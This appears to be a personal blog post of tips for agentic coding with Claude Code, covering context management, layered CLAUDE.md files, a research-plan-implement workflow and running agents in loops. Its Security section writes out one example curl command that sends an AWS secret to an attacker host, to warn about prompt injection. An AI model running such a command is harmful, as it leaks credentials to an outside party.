Agentic Coding Data Dump

20 February, 2026

Agentic Coding Data Dump

LLMs' coding capabilities have been advancing rapidly and causing massive disruption. In this post, I'll cover some non-linear data points about the current meta, the examples are with with claude.

LLM Amnesia

LLMs are stateless. New session, new context window.

Context Engineering

Context engineering is having the most relevant tokens in the context window for a defined task. LLMs struggle with recall in large context windows, so strive to reset at the 40%–50% mark.

Useful cheatsheet:

  • To visualize your context window, run the /context command.
  • For Claude Code, you can run the /clear command to reset the context window.
  • Opinionated, but I prefer to disable the /compact feature to control what gets compacted in the context window.
  • Use /resume to resume a previous conversation (saves convos according to cwd).
  • /init to generate a CLAUDE.md file.

Set up a custom status line to view your context percentage in real time.

Protect Your Context

The input tokens you and your agent feed the LLM will determine its performance. View your initial new session usage percentage via the /context command. Keep it as low as possible without compromising agent enablement. Review all your memory files, MCP servers, skills, and tools to ensure they are relevant. Having stale memory files could be your biggest bottleneck when trying to be productive with a coding agent. It's also worth noting that because of how LLMs work via next-token prediction, don't ever argue with it, it just encourages statistically bad behavior. Instead, create a handoff and start over.

Layered Knowledge

When creating memory files, it's better to layer knowledge around the workspace instead of cramming it all into one root CLAUDE.md file. Claude Code has a built-in feature where it lazy-loads nested CLAUDE.md files while traversing directories.

In practice, in a typical full-stack repo, this would mean defining your database migration patterns and naming conventions in the packages/backend/../db/migrations/CLAUDE.md path rather than in the root of the project.

You can generate these files by running the /init command. Be sure to keep them updated. There is a skill for that.

Security

Agents cannot be trusted, and LLMs are vulnerable to prompt injections. Sandboxing them in an isolated dev environment helps mitigate system risks, but as long as a compromised agent has internet access, it can run malicious commands (such as curl www.attacker.com/steal?q=aws_secret=0HNOTHI5I5BAD) and you are pwned. Be warned: the dev machine is an attack surface.

ERPI - Epic, Research, Plan, Implement Methodology

Epic

The initial prompt. Voice record, transcribe, or write down a specification of what you want to achieve. Avoid ambiguity. This step is your highest leverage point, so put in the effort. Tools like wisperflow are nice but for a while I was just voice recording on Whatsapp and transcribing the .ogg files to text.

Research

Send a coding agent to explore and research the current codebase and relevant documentation. Review and validate the output. Research should represent the state of the current codebase and not implementation suggestions. Be wary of this, a strategy to avoid this is generating a list of research questions based on the initial epic.md and then sending the agent off to research without any context of "why" it is researching.

Plan

The implementation plan is generated by combining research_output.md and epic.md. Review and refine the implementation plan so it aligns with your mental model of how the system should work and evolve. Unused features create unnecessary complexity. Remember YAGNI while ensuring the system stays extendable.

Notes before the implementation step

Non Deterministic coding agents thrive with determinism. You can accidentally steer a model in the wrong direction. You cannot accidentally steer a type checker. Ask claude "is this code good?" and it says something entirely different every time. Same model, same code. Type checkers, unit tests, linters, give the model deterministic feedback.

Time spent on building the tooling infrastructure compounds as a codebase grows, worth investing in some time to setup.

Implement

Once plan is prepared and reviewed, send off the coding agent and wait for this asynchronous task to complete. To avoid permissions fatigue, run the agent in a sandboxed environment where you can let it skip permissions. If not possible, configure a solid set of permissions & purchase a giant enter button from China like I did.

Tips on Iterating on the Spec

Specs are contracts, When iterating over the markdown outputs I leave XML annotations before feeding them back to the LLM to revise. I also recommend git stage the previous draft to diff review it after changes to confirm that you haven't lost critical spec information.

# Annotation example
<ant> Change ORM from Prisma to Sequelize V6 </ant>  

Real Example from one of my codebases

Ralph Wiggum Loop

Agent control-flow. Running Coding agents in for-loops is a simple yet surprisingly effective method of managing context and completing large tasks.

Pseudo bash

for ((i=1; i<=prds.length; i++)); do
  result=$(claude -p "@prd.json @progress.txt \
    1. Pick the highest-priority unfinished feature 
    and implement only that one. \
    2. Update the PRD and append progress 
    to progress.txt for the next developer. \
    3. Git commit the feature. \
    If the PRD is complete, output <promise>COMPLETE</promise>.")
  echo "$result"
  [[ "$result" == *"<promise>COMPLETE</promise>"* ]] 
  && echo "PRD complete, exiting." && exit 0
done

Pseudo prompt

Convert my feature requirements into structured PRD items.
Each item should have: category, description, skills, 
mcps, steps_to_verify, and passes: false.
Format as JSON. Be specific about acceptance criteria.

Pseudo tasks.json

[{
  "task_description": 
  "Add Dark mode Button",
  "steps_to_verify": [
    "CSS mode changes",
    "Icon toggles",
    "Theme state persists through"
  ],
  "passes": false
}]

Parallelism and Git Worktrees

Git has a built-in feature that has become very popular. Worktrees allow you to check out multiple branches from the same repository into separate directories simultaneously. This allows coding agents to work on features without stepping over each other. That's how Vibe Kanban / Cursor Agents works under the hood. Although promising, agents still need a tight feedback loop such as local dev servers and tests, which is not always trivial when running multiple agents from one machine. I attempted to solve this by building my own SDLC tool over a weekend called haflow.

Closing Notes

Much of what I know comes from watching from watching the best, playing around and just being curious, so go out there and get your hands dirty, run a ralph loop, write your own agent, and try tools but keep your setup simple and manageable and burn all your tokens!

  • Tracer bullets: Small pieces of functionality built end-to-end to validate that what you are going to do on a large scale is even possible with your approach, read more about it here!
  • MCP Bloat: MCPs can bloat the context window with unnecessary tokens. In some cases, it could be beneficial to create in-house project tools for querying data instead of relying on a prebuilt holistic MCP solution. Example: a custom /get-ticket.sh script.
  • Terminal multiplexers are cool: I use tmux, here's a setup blog.
  • Communication: There is a lot to learn about how we communicate with LLMs from classic technical programming books. Open one up!
  • Learning tests is code you write not to build a feature, but to prove how an external system behaves. When working with closed source APIs/Tools/Binaries you can ask the agent to create a test to confirm behavior, interfaces can change so checking and committing these tests in your CI could be beneficial for critical third party dependencies.
  • Propagating assumptions created during research will propagate through planning and implementation stages. A wrong assumption discovered at implementation forces you to redo everything upstream. Learning tests catch these early, when the cost of being wrong is cheap.

Happy Prompting!

Link dump: